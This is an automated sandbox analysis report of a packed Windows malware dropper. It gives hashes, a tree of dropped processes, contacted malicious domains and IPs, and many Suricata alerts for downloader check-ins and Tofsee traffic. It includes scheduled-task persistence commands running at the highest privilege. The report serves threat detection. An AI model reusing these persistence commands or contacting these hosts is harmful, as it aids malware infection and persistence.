Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 4, 2021, 2:43 p.m.	Nov. 4, 2021, 3:05 p.m.

Size	172.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`8ac9ae1dd3a33406003c4456359a9db4`
SHA256	`7890f85114dba72bfafa6dd4cca59d2ac030458e32136c3a5ce992469cc353bc`
CRC32	`72EDE583`
ssdeep	`3072:DRt67jtKBIKViaBNa1wK9BOomGbV3gWph+l5/yyvcOGkXthDBzBAXL+laxX19551:+kBKia6QBOaV3PgNyyvcOGkXTDBzySlP`
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

ww_testLL_0211_single.exe "C:\Users\test22\AppData\Local\Temp\ww_testLL_0211_single.exe"
2316
- egqRAdMP6vVHIbhfUato690f.exe "C:\Users\test22\Pictures\Adobe Films\egqRAdMP6vVHIbhfUato690f.exe"
  2488
- Ehb3TX09sP7PC0g9ewmGExxA.exe "C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe"
  2548
  - Zz_8WJnWJcYwE8DTXxWfai7o.exe "C:\Users\test22\Documents\Zz_8WJnWJcYwE8DTXxWfai7o.exe"
    2796
    - 301tY1t7qg8_zDCV75DGJBHH.exe "C:\Users\test22\Pictures\Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe"
      3044
    - xMRgMWwvt1Js2S4aChs4n12H.exe "C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe"
      2300
    - 4dB197_1l7OerQHV9HHywWV_.exe "C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe"
      2432
      - 4dB197_1l7OerQHV9HHywWV_.exe "C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe" -u
        2516
    - xETOXMkcQToHPFfFUFdC0rZ7.exe "C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe"
      2384
    - d78LyqpVrYNmErU4VFpgMs_C.exe "C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe"
      300
    - 82YG_xkSvDww7zcrD21MLhC8.exe "C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe"
      2840
      - 82YG_xkSvDww7zcrD21MLhC8.tmp "C:\Users\test22\AppData\Local\Temp\is-TS3P8.tmp\82YG_xkSvDww7zcrD21MLhC8.tmp" /SL5="$140020,506127,422400,C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe"
        536
        
        DYbALA.exe "C:\Users\test22\AppData\Local\Temp\is-OTC82.tmp\DYbALA.exe" /S /UID=2709
        500
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    2836
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    2872
- 01NWJ3EqrrXXQcofclOmpgme.exe "C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe"
  2592
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
ip-api.com	A 208.95.112.1	208.95.112.1
telegram.org	A 149.154.167.99	149.154.167.99
dataonestorage.com	A 45.142.182.152	45.142.182.152
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57 A 23.32.56.121 A 23.32.56.144	23.216.159.81
f.gogamef.com	A 172.67.136.94 A 104.21.72.228	104.21.72.228
twitter.com	A 104.244.42.65	104.244.42.65
el5en1977834657.s3.ap-south-1.amazonaws.com	A 52.219.66.59 CNAME s3-r-w.ap-south-1.amazonaws.com	52.219.64.55
ipinfo.io	A 34.117.59.81	34.117.59.81
eguntong.com	A 5.8.76.205	5.8.76.205
yandex.ru	A 5.255.255.5 A 77.88.55.55 A 5.255.255.70 A 77.88.55.70	5.255.255.5
t.gogamec.com	A 104.21.85.99 A 172.67.204.112	172.67.204.112
iplis.ru	A 88.99.66.31	88.99.66.31
staticimg.youtuuee.com	A 45.136.151.102	45.136.151.102
www.hzradiant.com	A 194.163.158.120	194.163.158.120
imgs.googlwaa.com	A 45.136.113.13	45.136.113.13
fouratlinks.com	A 199.192.17.247	199.192.17.247
d.gogamed.com	A 172.67.185.110 A 104.21.59.236	104.21.59.236
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.133.233

IP Address	Status	Action
104.21.72.228	Active	Moloch
104.244.42.65	Active	Moloch
121.254.136.27	Active	Moloch
149.154.167.99	Active	Moloch
162.159.133.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.185.110	Active	Moloch
172.67.204.112	Active	Moloch
194.163.158.120	Active	Moloch
199.192.17.247	Active	Moloch
208.95.112.1	Active	Moloch
212.192.241.62	Active	Moloch
23.32.56.144	Active	Moloch
34.117.59.81	Active	Moloch
45.133.1.107	Active	Moloch
45.133.1.182	Active	Moloch
45.136.113.13	Active	Moloch
45.136.151.102	Active	Moloch
45.142.182.152	Active	Moloch
5.255.255.5	Active	Moloch
5.8.76.205	Active	Moloch
52.219.66.59	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49164 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49162 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49162 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49177 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.133.1.107:80 -> 192.168.56.103:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49171	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 149.154.167.99:443 -> 192.168.56.103:49187	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 5.255.255.5:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49199 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49199	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 212.192.241.62:80	2034202	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2	A Network Trojan was detected
TCP 192.168.56.103:49209 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49209 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 149.154.167.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49197 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49200 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49212 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49213 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49213 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49213	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49170 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 34.117.59.81:443 -> 192.168.56.103:49170	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49207 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49188 -> 104.244.42.65:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49194 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49219 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 212.192.241.62:80	2034192	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin	A Network Trojan was detected
TCP 192.168.56.103:49233 -> 104.21.72.228:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49202 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49193 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49193 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49193	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 45.136.113.13:80 -> 192.168.56.103:49220	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49198 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49218 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49218	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 172.67.185.110:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49226 -> 172.67.185.110:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49238	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49222 -> 172.67.185.110:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49222 -> 172.67.185.110:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49251 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49258 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49256 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.8.76.205:80 -> 192.168.56.103:49235	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49270 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49227 -> 52.219.66.59:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.8.76.205:80 -> 192.168.56.103:49235	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49278 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49273 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49283 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 52.219.66.59:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49298 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49292 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49300 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49237 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49297 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49304 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49208 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49208 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49210 -> 162.159.133.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49305 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49224 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.133.1.107:80 -> 192.168.56.103:49214	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.103:49214	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49249	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49253 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49257 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49269 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49274 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 172.67.185.110:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49284 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49286 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49289 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49217 -> 162.159.133.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.133.233:80 -> 192.168.56.103:49217	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49229 -> 172.67.185.110:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49299 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49301 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49306 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49261 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49264 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49315 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49275 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49279 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49280 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 199.192.17.247:80 -> 192.168.56.103:49320	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49281 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49282 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49263 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49293 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49295 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49266 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49302 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49307 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49309 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49272 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49321 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49323 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49277 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49285 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49288 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49294 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49303 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49248 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49247 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49260 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49265 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49267 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49310 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49276 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49312 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49296 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49313 -> 52.219.66.59:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49325 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49314 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49326 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49181 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49183 162.159.133.233:443	None	None	None
TLSv1 192.168.56.103:49190 5.255.255.5:443	C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA	C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az	2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29
TLSv1 192.168.56.103:49195 88.99.66.31:443	C=US, O=Let's Encrypt, CN=R3	CN=iplogger.com	92:14:16:9c:56:a1:f2:6a:b9:1d:e1:8d:4c:5f:a4:57:a7:9c:a0:6b
TLSv1 192.168.56.103:49197 88.99.66.31:443	C=US, O=Let's Encrypt, CN=R3	CN=iplogger.com	92:14:16:9c:56:a1:f2:6a:b9:1d:e1:8d:4c:5f:a4:57:a7:9c:a0:6b
TLSv1 192.168.56.103:49212 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49213 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49170 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
